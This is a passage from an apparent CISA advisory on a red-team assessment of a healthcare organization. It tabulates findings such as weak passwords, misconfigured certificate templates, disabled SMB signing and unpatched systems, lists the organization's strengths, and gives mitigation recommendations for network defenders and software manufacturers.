6467. <td><strong>Severity</strong></td>
6468. <td><strong>Service</strong></td>
6469. <td><strong>Description</strong></td>
6470. </tr>
6471. </thead>
6472. <tbody>
6473. <tr>
6474. <td>
6475. <p>Poor Credential Hygiene: Easily Crackable Passwords</p>
6476. </td>
6477. <td>
6478. <p>High</p>
6479. </td>
6480. <td>
6481. <p>Penetration Testing</p>
6482. </td>
6483. <td>
6484. <p>As part of their assessment, the team reviewed the organization’s domain password policy and found it was weak because the minimum password length was set to 8 characters. Passwords less than 15 characters without randomness are easily crackable, and malicious actors with minimal technical knowledge can use these credentials to access the related services.</p>
6485. <p>The assessment team was able to easily crack many passwords throughout the assessment to move laterally and increase access within the domain. Specifically, the team:</p>
6486. <ul>
6487. <li>Cracked the NTLMv2 hash for a domain account, and subsequently accessed the domain. (See the Attack Path 1 section.)</li>
6488. </ul>
6489. <p>Cracked the password hash (obtained via Kerberoasting) of a domain administrator account and subsequently compromised the domain. (See the Attack Path 1 section.)</p>
6490. </td>
6491. </tr>
6492. <tr>
6493. <td>
6494. <p>Poor Credential Hygiene: Guessable Credentials</p>
6495. </td>
6496. <td>
6497. <p>High</p>
6498. </td>
6499. <td>
6500. <p>Penetration Testing</p>
6501. </td>
6502. <td>
6503. <p>As part of the penetration test, the assessment team tested to see if one or more services is accessible using a list of enumerated usernames alongside an easily guessed password. The objective is to see if a malicious actor with minimal technical knowledge can use these credentials to access the related services, enabling them to move laterally or escalate privileges. Easily guessable passwords are often comprised of common words, seasons, months and/or years, and are sometimes combined with special characters. Additionally, phrases or names that are popular locally (such as the organization being tested or a local sports teams) may also be considered easily guessable.</p>
6504. <p>The team sprayed common passwords against domain user accounts and obtained valid credentials for standard domain users. (See the Attack Path 3 section.) (Cracking was not necessary for this attack.)</p>
6505. </td>
6506. </tr>
6507. <tr>
6508. <td>
6509. <p>Misconfigured ADCS Certificate Templates</p>
6510. </td>
6511. <td>
6512. <p>High</p>
6513. </td>
6514. <td>
6515. <p>Penetration Testing</p>
6516. </td>
6517. <td>
6518. <p>The team identified a WebServer template configured to allow all authenticated users permission to change the properties of the template and obtain certificates for different users. The team exploited the template to acquire a certificate for a Domain Administrator account (see the Attack Path 2 section).</p>
6519. </td>
6520. </tr>
6521. <tr>
6522. <td>
6523. <p>Unnecessary Network Services Enabled</p>
6524. </td>
6525. <td>
6526. <p>High</p>
6527. </td>
6528. <td>
6529. <p>Penetration Testing</p>
6530. </td>
6531. <td>
6532. <p>Malicious actors can exploit security vulnerabilities and misconfigurations in network services, especially legacy services.</p>
6533. <p>The assessment team identified legacy name resolution protocols (e.g., NetBIOS, LLMNR, mDNS) enabled in the network, and abused LLMNR to capture NTLMv2 hashes, which they then cracked and used for domain access. (See the Attack Path 1 section.)</p>
6534. <p>The team also identified an ADCS server with web enrollment enabled and leveraged it to compromise the domain through coercion and relaying. (See Attack Path 3 section.)</p>
6535. <p>Additionally, the team identified hosts with <code>WebClient</code> and Spooler services, which are often abused by malicious actors to coerce authentication.</p>
6536. </td>
6537. </tr>
6538. <tr>
6539. <td>
6540. <p>Elevated Service Account Privileges</p>
6541. </td>
6542. <td>
6543. <p>High</p>
6544. </td>
6545. <td>
6546. <p>Penetration Testing</p>
6547. </td>
6548. <td>
6549. <p>Applications often require user accounts to operate. These user accounts, which are known as service accounts, often require elevated privileges. If an application or service running with a service account is compromised, an actor may have the same privileges and access as the service account.</p>
6550. <p>The CISA team identified a service account with Domain Administrator privileges and used it to access the domain after cracking its password (See the Attack Path 1 section).</p>
6551. </td>
6552. </tr>
6553. <tr>
6554. <td>
6555. <p>SMB Signing Not Enabled</p>
6556. </td>
6557. <td>
6558. <p>High</p>
6559. </td>
6560. <td>
6561. <p>Penetration Testing</p>
6562. </td>
6563. <td>
6564. <p>The CISA team identified several systems on the organization’s network that do not enforce SMB signing and exploited this for relayed authentication to obtain cleartext credentials for two domain administrator accounts.</p>
6565. </td>
6566. </tr>
6567. <tr>
6568. <td>
6569. <p>Insecure Default Configuration: Default Credentials</p>
6570. </td>
6571. <td>
6572. <p>Medium</p>
6573. </td>
6574. <td>
6575. <p>Web Application Assessment</p>
6576. </td>
6577. <td>
6578. <p>Many off-the-shelf applications are released with built-in administrative accounts using predefined credentials that can often be found with a simple web search. Malicious actors with minimal technical knowledge can use these credentials to access the related services.</p>
6579. <p>During testing, the CISA team identified multiple web interfaces with default administrator credentials and used default credentials for a printer interface to capture domain credentials of a non-privileged domain account. (See the Attack Path 2 section.)</p>
6580. </td>
6581. </tr>
6582. </tbody>
6583. </table>
6584. <p>In addition to the issues listed above, the team identified three High and seven Medium severity findings. These vulnerabilities and misconfigurations may allow a malicious actor to compromise the confidentiality, integrity, and availability of the tested environment. See Table 4 for a list and description of these findings.</p>
6585. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6586. <caption><em>Table 4: Additional Key Issues</em></caption>
6587. <thead>
6588. <tr>
6589. <td><strong>Issue</strong></td>
6590. <td><strong>Severity</strong></td>
6591. <td><strong>Service</strong></td>
6592. <td><strong>Description</strong></td>
6593. </tr>
6594. </thead>
6595. <tbody>
6596. <tr>
6597. <td>
6598. <p>Poor Credential Hygiene: Password Reuse for Administrator and User Accounts</p>
6599. </td>
6600. <td>
6601. <p>High</p>
6602. </td>
6603. <td>
6604. <p>Penetration Testing</p>
6605. </td>
6606. <td>
6607. <p>Elevated password reuse is when an administrator uses the same password for their user and administrator accounts. If the user account password is compromised, it can be used to gain access to the administrative account.</p>
6608. <p>The assessment team identified an instance where the same password was set for an admin user’s administrative account as well as their standard user account.</p>
6609. </td>
6610. </tr>
6611. <tr>
6612. <td>
6613. <p>Poor Credential Hygiene: Password Reuse for Administrator Accounts</p>
6614. </td>
6615. <td>
6616. <p>Medium</p>
6617. </td>
6618. <td>
6619. <p>Penetration Testing</p>
6620. </td>
6621. <td>
6622. <p>If administrator passwords are the same for various administrator accounts, malicious actors can use the password to access all systems that share this credential after compromising one account.</p>
6623. <p>The assessment team found multiple instances of local administrator accounts across various systems using the same password.</p>
6624. </td>
6625. </tr>
6626. <tr>
6627. <td>
6628. <p>Poor Patch Management: Out-of-Date Software</p>
6629. </td>
6630. <td>
6631. <p>High</p>
6632. </td>
6633. <td>
6634. <p>Penetration Testing</p>
6635. </td>
6636. <td>
6637. <p>Patches and updates are released to address existing and emerging security vulnerabilities, and failure to apply the latest leaves systems open to attack with publicly available exploits. (The risk presented by missing patches and updates depends on the severity of the vulnerability).</p>
6638. <p>The assessment team identified several unpatched systems including instances of <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0708" title="CVE-2019-0708">CVE-2019-0708</a> (known as “BlueKeep”) and EternalBlue.</p>
6639. <p>The team was unable to successfully compromise the systems with BlueKeep, but they did exploit EternalBlue on a server to implant a shell on a server with local <code>SYSTEM</code> privileges (see the Attack Path 5 section).</p>
6640. </td>
6641. </tr>
6642. <tr>
6643. <td>
6644. <p>Poor Patch Management: Unsupported OS or Application</p>
6645. </td>
6646. <td>
6647. <p>High</p>
6648. </td>
6649. <td>
6650. <p>Penetration Testing</p>
6651. </td>
6652. <td>
6653. <p>Using software or hardware that is no longer supported by the vendor poses a significant security risk because new and existing vulnerabilities are no longer patched). There is no way to address security vulnerabilities on these devices to ensure that they are secure. The overall security posture of the entire network is at risk because an attacker can target these devices to establish an initial foothold into the network.</p>
6654. <p>The assessment team identified end-of-life (EOL) Windows Server 2008 R2 and Windows Server 2008 and Windows 5.1.</p>
6655. </td>
6656. </tr>
6657. <tr>
6658. <td>
6659. <p>Use of Weak Authentication Measures</p>
6660. </td>
6661. <td>
6662. <p>Medium</p>
6663. </td>
6664. <td>
6665. <p>Penetration Testing</p>
6666. </td>
6667. <td>
6668. <p>Applications may have weak or broken mechanisms to verify user identity before granting user access to protected functionalities. Malicious actors can exploit these to bypass authentication and gain access to use application resources and functionality.</p>
6669. <p>The assessment team abused the Cisco Smart Install protocol to obtain configuration files for several Cisco devices on the organization’s network. These files contained encrypted Cisco passwords. (The CISA team was unable to crack these passwords within the assessment timeframe.)</p>
6670. </td>
6671. </tr>
6672. <tr>
6673. <td>
6674. <p>PII Disclosure</p>
6675. </td>
6676. <td>
6677. <p>Medium</p>
6678. </td>
6679. <td>
6680. <p>Penetration Testing</p>
6681. </td>
6682. <td>
6683. <p>The assessment team identified an unencrypted Excel file containing PII on a file share.</p>
6684. </td>
6685. </tr>
6686. <tr>
6687. <td>
6688. <p>Hosts with Unconstrained Delegation Enabled Unnecessarily</p>
6689. </td>
6690. <td>
6691. <p>Medium</p>
6692. </td>
6693. <td>
6694. <p>Penetration Testing</p>
6695. </td>
6696. <td>
6697. <p>The CISA team identified two systems that appeared to be configured with <code>Unconstrained Delegation</code> enabled. Hosts with <code>Unconstrained Delegation</code> enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform <a href="https://attack.mitre.org/versions/v14/techniques/T1558/001/" title="Steal or Forge Kerberos Tickets: Golden Ticket">golden ticket</a> or <a href="https://attack.mitre.org/versions/v14/techniques/T1558/002/" title="Steal or Forge Kerberos Tickets: Silver Ticket">silver ticket</a> attacks.</p>
6698. <p>Although the assessment team was unable to fully exploit this configuration because they lost access to one of the vulnerable hosts, it could have led to domain compromise under the right circumstances.</p>
6699. </td>
6700. </tr>
6701. <tr>
6702. <td>
6703. <p>Cleartext Password Disclosure</p>
6704. </td>
6705. <td>
6706. <p>Medium</p>
6707. </td>
6708. <td>
6709. <p>Penetration Testing</p>
6710. </td>
6711. <td>
6712. <p>Storing passwords in cleartext is a security risk because malicious actors with access to these files can use them.</p>
6713. <p>The assessment team identified several unencrypted files on a file share containing passwords for various personal and organizational accounts.</p>
6714. </td>
6715. </tr>
6716. <tr>
6717. <td>
6718. <p>Insecure File Shares</p>
6719. </td>
6720. <td>
6721. <p>Medium</p>
6722. </td>
6723. <td>
6724. <p>Penetration Testing</p>
6725. </td>
6726. <td>
6727. <p>Access to sensitive data (e.g., data related to business functions, IT functions, and/or personnel) should be restricted to only certain authenticated and authorized users.</p>
6728. <p>The assessment team found an unsecured directory on a file share with sensitive IT information. The directory was accessible to all users in the domain group. Malicious actors with user privileges could access and/or exfiltrate this data.</p>
6729. </td>
6730. </tr>
6731. </tbody>
6732. </table>
6733. <h5><em>Additional Issues</em></h5>
6734. <p>The CISA team identified one Informational severity within the organization’s networks and systems. These issues may allow a malicious actor to compromise the confidentiality, integrity, and availability of the tested environment, but are not readily exploitable. The information provided is to encourage the stakeholder to investigate these issues further to adjust their environments or eliminate certain aspects as needed, but the urgency is low.</p>
6735. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6736. <caption><em>Table 5: Informational Issues That CISA Team Noted</em></caption>
6737. <thead>
6738. <tr>
6739. <td><strong>Issue</strong></td>
6740. <td><strong>Severity</strong></td>
6741. <td><strong>Service</strong></td>
6742. <td><strong>Description</strong></td>
6743. </tr>
6744. </thead>
6745. <tbody>
6746. <tr>
6747. <td>
6748. <p>Overly Permissive Accounts</p>
6749. </td>
6750. <td>
6751. <p>  Informational</p>
6752. </td>
6753. <td>
6754. <p> Penetration Testing</p>
6755. </td>
6756. <td>
6757. <p>Account privileges are intended to control user access to host or application resources to limit access to sensitive information in support of a least-privilege security model. When user (or other) accounts have high privileges, users can see and/or do things they normally should not, and malicious actors can exploit this to access host and application resources.</p>
6758. <p>The assessment team identified Active Directory objects where the <code>Human Resources</code> group appeared to be part of the privileged <code>Account Operators</code> group. This may have provided elevated privileges to accounts in the <code>Human Resources</code> group. (The CISA team was unable to validate and demonstrate the potential impact of this relationship within the assessment period).</p>
6759. </td>
6760. </tr>
6761. </tbody>
6762. </table>
6763. <h5><em><strong>Noted Strengths</strong></em></h5>
6764. <p>The CISA team noted the following business, technical, and administrative components that enhanced the network security posture of the tested environment:</p>
6765. <ul>
6766. <li>The organization’s network was found to have several strong, security-oriented characteristics such as:
6767. <ul>
6768. <li>Effective antivirus software;</li>
6769. <li>Endpoint detection and response capabilities;</li>
6770. <li>Good policies and best practices for protecting users from malicious files including not allowing users to mount ISO files;</li>
6771. <li>Minimal external attack surface, limiting an adversary’s ability to leverage external vulnerabilities to gain initial access to the organization’s networks and systems;</li>
6772. <li>Strong wireless protocols;</li>
6773. <li>And network segmentation.</li>
6774. </ul>
6775. </li>
6776. <li>The organization’s security also demonstrated their ability to detect some of the CISA team's actions throughout testing and overall situational awareness through the use of logs and alerts.</li>
6777. <li>The organization used MFA for cloud accounts. The assessment team obtained cloud credentials via a phishing campaign but was unable to use them because of MFA prompts.</li>
6778. </ul>
6779. <h3><strong>MITIGATIONS</strong></h3>
6780. <h4><strong>Network Defenders</strong></h4>
6781. <p>CISA recommends HPH Sector and other critical infrastructure organizations implement the mitigations in Table 6 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
6782. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6783. <caption><em>Table 6: Recommendations to Mitigate Identified Issues</em></caption>
6784. <thead>
6785. <tr>
6786. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Issue</strong></th>
6787. <th scope="col" role="columnheader"><strong>Recommendation</strong></th>
6788. </tr>
6789. </thead>
6790. <tbody>
6791. <tr>
6792. <td>
6793. <p>Poor Credential Hygiene: Easily Crackable Passwords</p>
6794. </td>
6795. <td>
6796. <ul>
6797. <li><strong>Follow National Institute of Standards and Technologies (NIST) <a href="https://csrc.nist.gov/publications/detail/sp/800-63b/final" title="Digital Identity Guidelines: Authentication and Lifecycle Management">guidelines</a> </strong><strong>when creating password policies</strong> to enforce use of “strong” passwords that cannot be cracked [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a><u>]</u>.[<a href="https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final" title="Digital Identity Guidelines: Authentication and Lifecycle Management">11</a>] Consider using password managers to generate and store passwords.</li>
6798. <li><strong>Use “strong” passphrases for private keys</strong> to make cracking resource intensive [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a><u>]</u>. Do not store credentials within the registry in Windows systems. Establish an organizational policy that prohibits password storage in files.</li>
6799. <li><strong>Ensure adequate password length (ideally 15+ characters) and complexity requirements for Windows service accounts</strong> and implement passwords with periodic expiration on these accounts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a>]. Use Managed Service Accounts, when possible, to manage service account passwords automatically.</li>
6800. </ul>
6801. </td>
6802. </tr>
6803. <tr>
6804. <td>
6805. <p>Poor Credential Hygiene: Guessable Credentials</p>
6806. </td>
6807. <td>
6808. <ul>
6809. <li><strong>Do not reuse local administrator account passwords across systems</strong>. Ensure that passwords are “strong” and unique [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.C</a>].</li>
6810. <li><strong>Use phishing-resistant multi-factor authentication (MFA) for all administrative access</strong>, including domain administrative access [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.H</a>]. If an organization that uses mobile push-notification-based MFA is unable to implement phishing-resistant MFA, use number matching to mitigate MFA fatigue. For more information, see CISA fact sheets on <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="mplementing Phishing-Resistant MFA">Implementing Phishing-Resistant MFA</a> and <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implement-number-matching-in-mfa-applications-508c.pdf" title="Implementing Number Matching in MFA Applications">Implementing Number Matching in MFA Applications</a>.</li>
6811. </ul>
6812. </td>
6813. </tr>
6814. <tr>
6815. <td>
6816. <p>Misconfigured ADCS Certificate Templates</p>
6817. </td>
6818. <td>
6819. <ul>
6820. <li><strong>Restrict enrollment rights in templates to only those users or groups that require it</strong>. Remove the <code>Enrollee Supplies Subject</code> flag from templates if it is not necessary or enforce manager approval if required. Consider removing <code>Write Owner, Write DACL</code> and <code>Write Property</code> permissions from low-privilege groups, such as <code>Authenticated Users</code> where those permissions are not needed.</li>
6821. </ul>
6822. </td>
6823. </tr>
6824. <tr>
6825. <td>
6826. <p>Unnecessary Network Services Enabled</p>
6827. </td>
6828. <td>
6829. <ul>
6830. <li><strong>Ensure that only ports, protocols, and services with validated business needs are running on each system</strong>. Disable deprecated protocols (including NetBIOS, LLMNR, and mDNS) on the network that are not strictly necessary for business functions, or limit the systems and services that use the protocol, where possible [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.W</a>].</li>
6831. <li><strong>Disable the </strong><code><strong>WebClient</strong></code><strong> and Spooler services</strong> where possible to minimize risk of coerced authentication.</li>
6832. <li><strong>Disable ADCS web-enrollment services</strong>. If this service cannot be disabled, disable NTLM authentication to prevent malicious actors from performing NTLM relay attacks or abusing the Spooler and <code>WebClient</code> services to coerce and relay authentication to the web-enrollment service.</li>
6833. </ul>
6834. </td>
6835. </tr>
6836. <tr>
6837. <td>
6838. <p>Elevated Service Account Privileges</p>
6839. </td>
6840. <td>
6841. <ul>
6842. <li><strong>Run daemon applications using a non-Administrator account</strong> when appropriate.</li>
6843. <li><strong>Configure Service accounts with only the permissions necessary for the services they operate</strong>.</li>
6844. <li>To mitigate Kerberoasting attacks, <strong>use AES or stronger encryption</strong> instead of RC4 for Kerberos hashes [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.K</a>]. RC4 is considered weak encryption.</li>
6845. </ul>
6846. </td>
6847. </tr>
6848. <tr>
6849. <td>
6850. <p>SMB Signing Not Enabled</p>
6851. </td>
6852. <td>
6853. <ul>
6854. <li><strong>Require SMB signing for both SMB client and server on all systems</strong> to prevent certain adversary-in-the-middle and pass-the-hash attacks. See Microsoft’s <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing" title="Overview of Server Message Block signing">Overview of Server Message Block signing</a> for more information.</li>
6855. </ul>
6856. </td>
6857. </tr>
6858. <tr>
6859. <td>
6860. <p>Insecure Default Configuration: Default Credentials</p>
6861. </td>
6862. <td>
6863. <ul>
6864. <li><strong>Verify the implementation of appropriate hardening measures, and change, remove, or deactivate all default credentials</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.A</a>].</li>
6865. <li>Before deploying any new devices in a networked environment, <strong>change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems</strong> to have values consistent with administration-level accounts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.A</a>].</li>
6866. </ul>
6867. </td>
6868. </tr>
6869. <tr>
6870. <td>
6871. <p>Poor Credential Hygiene: Password Reuse for Administrator and User Accounts</p>
6872. </td>
6873. <td>
6874. <ul>
6875. <li><strong>Discontinue reuse or sharing of administrative credentials</strong> among user/administrative accounts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.C</a>].</li>
6876. <li><strong>Use unique credentials across workstations</strong>, when possible,<strong> </strong>in accordance with applicable federal standards, industry best practices, and/or agency-defined requirements.</li>
6877. <li><strong>Train users, especially privileged users, against password reuse</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.I</a>].</li>
6878. </ul>
6879. </td>
6880. </tr>
6881. <tr>
6882. <td>
6883. <p>Poor Credential Hygiene: Password Reuse for Administrator Accounts</p>
6884. </td>
6885. <td>
6886. <ul>
6887. <li><strong>Discontinue reuse or sharing of administrative credentials among systems </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.C</a>]. When possible, use unique credentials across all workstations in accordance with applicable federal standards, industry best practices, and/or agency-defined requirements.</li>
6888. <li><strong>Implement a security awareness program</strong> that focuses on the methods commonly used in intrusions that can be blocked through individual action [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.I</a>].</li>
6889. <li><strong>Implement Local Administrator Password Solution (LAPS)</strong> where possible if your OS is older than Windows Server 2019 and Windows 10 as these versions do not have LAPS built in. <strong>Note:</strong> The authoring organizations recommend organizations upgrade to Windows Server 2019 and Windows 10 or greater.</li>
6890. </ul>
6891. </td>
6892. </tr>
6893. <tr>
6894. <td>
6895. <p>Poor Patch Management: Out-of-Date Software</p>
6896. </td>
6897. <td>
6898. <ul>
6899. <li><strong>Enforce consistent patch management</strong> across all systems and hosts within the network environment [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 1.E</a>].</li>
6900. <li>Where patching is not possible due to limitations, <strong>implement network segregation controls</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.F</a>] to limit exposure of the vulnerable system or host.</li>
6901. <li><strong>Consider deploying automated patch management tools and software update tools</strong> for operating system and software/applications on all systems for which such tools are available and safe.</li>
6902. </ul>
6903. </td>
6904. </tr>
6905. <tr>
6906. <td>
6907. <p>Poor Patch Management: Unsupported OS or Application</p>
6908. </td>
6909. <td>
6910. <ul>
6911. <li><strong>Evaluate the use of unsupported hardware and software and discontinue</strong> where possible. If discontinuing the use of unsupported hardware and software is not possible, implement additional network protections to mitigate the risk.</li>
6912. </ul>
6913. </td>
6914. </tr>
6915. <tr>
6916. <td>
6917. <p>Use of Weak Authentication Measures</p>
6918. </td>
6919. <td>
6920. <ul>
6921. <li><strong>Require phishing-resistant MFA for all user accounts that have access to sensitive data or systems</strong>. If MFA is not possible, it is recommended to, at a minimum, configure a more secure password policy by aligning with guidelines put forth by trusted entities such as NIST [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.H</a>].</li>
6922. </ul>
6923. </td>
6924. </tr>
6925. <tr>
6926. <td>
6927. <p>PII Disclosure</p>
6928. </td>
6929. <td>
6930. <ul>
6931. <li><strong>Implement a process to review files and systems for insecure handling of PII </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.L</a>].<strong> </strong>Properly secure or remove the information. Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext.</li>
6932. <li><strong>Encrypt PII and other sensitive data</strong>, and train users who handle sensitive data to utilize best practices for encrypting data and storing it securely. If sensitive data must be stored on shares or other locations, restrict access to these locations as much as possible through access controls and network segmentation [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.F, 2.K, 2.L</a>].</li>
6933. </ul>
6934. </td>
6935. </tr>
6936. <tr>
6937. <td>
6938. <p>Hosts with Unconstrained Delegation Enabled Unnecessarily</p>
6939. </td>
6940. <td>
6941. <ul>
6942. <li><strong>Remove </strong><code><strong>Unconstrained Delegation</strong></code><strong> from all servers</strong>. If <code>Unconstrained Delegation</code> functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., configure <code>Constrained Delegation</code>, enable the <code>Account is sensitive and cannot be delegated</code> option) or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater.</li>
6943. </ul>
6944. </td>
6945. </tr>
6946. <tr>
6947. <td>
6948. <p>Cleartext Password Disclosure</p>
6949. </td>
6950. <td>
6951. <ul>
6952. <li><strong>Implement a review process for files and systems to look for cleartext account credentials</strong>. When credentials are found, remove or change them to maintain security [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.L</a>].</li>
6953. <li><strong>Conduct periodic scans of server machines using automated tools to determine whether sensitive data</strong> (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext. Consider implementing a secure password manager solution in cases where passwords need to be stored [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.L</a>].</li>
6954. </ul>
6955. </td>
6956. </tr>
6957. <tr>
6958. <td>
6959. <p>Insecure File Shares</p>
6960. </td>
6961. <td>
6962. <ul>
6963. <li><strong>Restrict access to file shares containing sensitive data</strong> to only certain authenticated and authorized users [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.L</a>].</li>
6964. </ul>
6965. </td>
6966. </tr>
6967. </tbody>
6968. </table>
6969. <p>Additionally, CISA recommends that HPH sector organizations implement the following strategies to mitigate cyber threats:</p>
6970. <ul>
6971. <li><strong>Mitigation Strategy #1 Asset Management and Security:</strong>
6972. <ul>
6973. <li>CISA recommends that HPH sector organizations implement and maintain an asset management policy to reduce the risk of exposing vulnerabilities, devices, or services that could be exploited by threat actors to gain unauthorized access, steal sensitive data, or disrupt critical services. The focus areas for this mitigation strategy include asset management and asset security, addressing asset inventory, procurement, decommissioning, and network segmentation as they relate to hardware, software, and data assets.</li>
6974. </ul>
6975. </li>
6976. <li><strong>Mitigation Strategy #2 Identity Management and Device Security:</strong>
6977. <ul>
6978. <li>CISA recommends entities secure their devices and digital accounts and manage their online access to protect sensitive data and PII/PHI from compromise. The focus areas for this mitigation strategy include email security, phising prevention, access management, password policies, data protection and loss prevention, and device logs and monitoring solutions.</li>
6979. </ul>
6980. </li>
6981. <li><strong>Mitigation Strategy #3 Vulnerability, Patch, and Configuration Management:</strong>
6982. <ul>
6983. <li>CISA recommends entities mitigate known vulnerabilities and establish secure configuration baselines to reduce the likelihood of threat actors exploiting known vulnerabilities to breach organizational networks. The focus areas for this mitigation strategy include vulnerability and patch Management, and configuration and change management.</li>
6984. </ul>
6985. </li>
6986. </ul>
6987. <p>For more information on these mitigations strategies, see CISA’s <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/healthcare-and-public-health-sector" title="Healthcare and Public Health Sector">Healthcare and Public Health Sector</a> webpage.</p>
6988. <h4><strong>Software Manufacturers</strong></h4>
6989. <p>The above mitigations apply to HPH sector and other critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of the majority of these flaws, and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team:</p>
6990. <ul>
6991. <li><strong>Embed security into product architecture throughout the</strong> <strong>entire</strong> software development lifecycle (SDLC).</li>
6992. <li><strong>Eliminate default passwords</strong>. Do not provide software with default passwords. To eliminate default passwords, require administrators set a “strong” password [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.B</a>] during installation and configuration.</li>
6993. <li><strong>Create secure configuration templates</strong>. Provide configuration templates with certain safe settings based on an organization’s risk appetite (e.g., low, medium, and high security templates). Support these templates with hardening guides based on the risks the manufacturer has identified. The default configuration should be a secure one, and organizations should need to opt in if they desire a less secure configuration.</li>
6994. <li><strong>Design products so that the compromise of a single security control does not result in compromise of the entire system</strong>. For example, narrowly provision user privileges by default and employ ACLs to reduce the impact of a compromised account. This will make it more difficult for a malicious cyber actor to escalate privileges and move laterally.</li>
6995. <li><strong>Mandate MFA, </strong><a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA"><strong>ideally phishing-resistant MFA</strong></a><strong>, for privileged users</strong> and make MFA a default, rather than opt-in, feature.</li>
6996. </ul>
6997. <p>These mitigations align with tactics provided in the joint guide <a href="https://www.cisa.gov/sites/default/files/2023-10/Shifting-the-Balance-of-Cybersecurity-Risk-Principles-and-Approaches-for-Secure-by-Design-Software.pdf" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a>. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.</p>
6998. <p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a" title="NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations">NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations</a>.</p>
